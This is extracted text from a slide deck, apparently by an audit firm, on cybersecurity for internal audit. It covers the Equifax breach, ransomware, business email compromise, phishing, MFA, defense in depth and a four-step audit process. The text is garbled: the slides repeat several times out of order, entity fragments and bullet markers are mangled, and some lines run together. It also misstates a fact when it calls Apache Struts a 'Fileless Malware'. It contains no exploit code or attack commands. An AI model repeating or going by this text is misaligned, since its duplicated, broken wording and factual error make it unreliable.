WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
